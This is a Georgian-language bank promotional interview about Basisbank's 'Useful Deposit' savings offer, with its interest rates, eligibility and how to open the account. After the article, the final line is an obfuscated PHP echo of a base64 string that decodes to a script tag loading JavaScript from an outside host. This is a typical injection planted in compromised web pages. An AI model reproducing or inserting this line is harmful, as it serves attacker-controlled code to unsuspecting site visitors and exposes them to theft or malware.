celsiusi
ავერსი საქკაბელი

 

 

       თუ თანხის გონივრულად დაზოგვა გსურთ, მაშინ ბაზისბანკის ახალი შეთავაზება „სასარგებლო ანაბარი“ სწორედ თქვენთვისაა. საქართველოში ანაბრების ბაზარი წლიდან წლამდე ვითარდება და იზრდება. უფრო მოქნილი ხდება ბანკების შეთავაზებები, რომლებიც მომხმარებლებს თანხის სხვადასხვა გზით დაზოგვის შესაძლებლობას სთავაზობენ.


მოსახლეობის საშუალო ეკონომიკური მდგომარეობიდან გამომდინარე, დღეს ყველაზე დიდი მოთხოვნა შემნახველი ტიპის ანაბრებზეა. ასეთ შემთხვევაში ანაბრის მფლობელს დეპოზიტზე განთავსებული თანხის გამოყენება მისთვის სასურველ დროს შეუძლია. სწორედ ამ ტიპისაა ბაზისბანკის „სასარგებლო ანაბარი“, რომლის გახსნის შემთხვევაში მომხმარებლები სტანდარტულს +1%-იან სარგებელს მიიღებენ. „სასარგებლო ანაბრის“ აქციაში ჩართვა 31 ივლისის ჩათვლითაა შესაძლებელი. მისი უპირატესობების შესახებ კი ბაზისბანკის პროდუქტების და სერვისების განვითარების დეპარტამენტის უფროსი, მარეხ საჯაია გვესაუბრება.

რას გულისხმობს ბაზისბანკის ახალი შეთავაზება „სასარგებლო ანაბარი“?

მუდმივად ვცდილობთ, რომ ჩვენი პროდუქტები მომხმარებლების საჭიროებებზე მორგებული იყოს. სწორედ ამიტომ, მათთვის შევქმენით ახალი შეთავაზება, რომლის ფარგლებშიც ივლისის ბოლომდე მომხმარებლებს შესაძლებლობა ექნებათ, გახსნან ჩვენთან სასარგებლო ტიპის ანაბარი და მიიღონ ყველაზე მაღალი სარგებელი ბაზარზე. სტანდარტული ვადიანი ანაბრებისგან განსხვავებით, სადაც მომხმარებელს საკუთარ თანხაზე წვდომა გარკვეული ვადით ეზღუდება, „სასარგებლო ანაბარზე“ კი თანხის დამატება ან გატანა ნებისმიერ დროსაა შესაძლებელი.

ანაბრის გახსნა შესაძლებელია როგორც ლარში, ისე დოლარსა და ევროში. ეს მოქნილობას აძლევს მომხმარებელს, რადგან შეუძლია ნებისმიერ მომენტში გადაცვალოს მისი თანხა სხვა ვალუტაში ჩვენი სპეცკურსით, რომელიც დღეს ბაზარზე ვალუტის საუკეთესო კურსია.

შეთავაზების ფარგლებში მეანაბრე მიიღებს სტანდარტულს +1% სარგებელს, რომელიც შემდეგნაირად გამოიყურება:
• დოლარში - 2%
• ევროში- 1.5%
• ლარში - 8.5%
მომხმარებელი ყოველი თვის ბოლოს მიიღებს იმ მომენტში ანგარიშზე არსებული თანხის შესაბამის სარგებელს. მიიღე ყველაზე მაღალი სარგებელი და მართე საკუთარი ფინანსები თავისუფლად - სწორედ ეს არის ჩვენი შეთავაზების ორი მთავარი უპირატესობა.

20230629 123013ბზბ

ვისთვის არის განკუთვნილი „სასარგებლო ანაბარი“?
მათთვის, ვისაც გარკვეული დანაზოგი აქვთ და რეგულარულადაც იყენებენ სხვადასხვა ტიპის ანაბარს. თუმცა, არიან გარკვეული მოლოდინის წინაშე, რომ გარკვეულ დროს მათ შეიძლება ამ თანხის გამოყენება დასჭირდეთ. შესაბამისად, მათთვის კონკრეტულ ვადაში შეთანხმება ანაბრის განთავსებაზე სირთულეებთან არის დაკავშირებული. ამ ტიპის მეანაბრეებს სურთ, რომ თანხა მათთვის ადვილად ხელმისაწვდომი იყოს.

როგორ ხდება ანაბრის გახსნა და მართვა?
ანაბრის გახსნა მარტივი პროცედურაა. ბაზისბანკის არსებულ მომხმარებლებს შეუძლიათ დისტანციური არხების და ბანკირების დახმარებით გახსნან. ხოლო ახალ მომხმარებლებს ანაბრის გასახსნელად ფილიალში ვიზიტი დასჭირდებათ.

თანხის გამოყენება ბანკის დისტანციური არხებით სრულად შესაძლებელია. მომხმარებლებს შეუძლიათ საბარათე ანგარიშზე გადმოიტანონ თანხა და იქიდან სურვილისამებრ დახარჯონ.

ზოგადად, რას ურჩევთ მომხმარებლებს, რა უნდა გაითვალისწინონ ანაბრის გახსნის დროს? რომელ ვალუტაში უფრო გონივრულია ანაბრის გახსნა?
ზოგადად, ანაბრის გახსნის დროს მომხმარებელმა პირველ რიგში მისი საჭიროებები და მიზნები უნდა განსაზღვრონ. ეს ნიშნავს, რომ მან მკაფიოდ უნდა იცოდეს, რისთვის აპირებს თანხის შენახვას. თუ სურს თანხის კონკრეტული ვადით შენახვა, აქვს მცირე ნაწილი, თუმცა, შენახვასთან ერთად ამატებს ან იღებს თანხას, მაშინ „სასარგებლო ანაბარი“ მისთვის იდეალური გადაწყვეტილებაა.

რაც შეეხება ვალუტას, ანაბრის ვალუტის შერჩევის დროს მომხმარებელმა პირადი საჭიროებები უნდა გაითვალისწინოს და შესაბამის ვალუტაში გახსნას ანაბარი.

კონკრეტული გადაწყვეტილების მისაღებად მათ შეუძლიათ ჩვენს ბანკირებს მიმართონ დახმარებისთვის. ჩვენთვის ორმაგად სასიამოვნოა იმის შეგრძნება, რომ მომხმარებელში მაღალი სანდოობით ვსარგებლობთ და ვართ ბანკი, სადაც ადამიანები ჩვენთან ერთად იწყებენ დაგროვებას.

(რ)

335
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");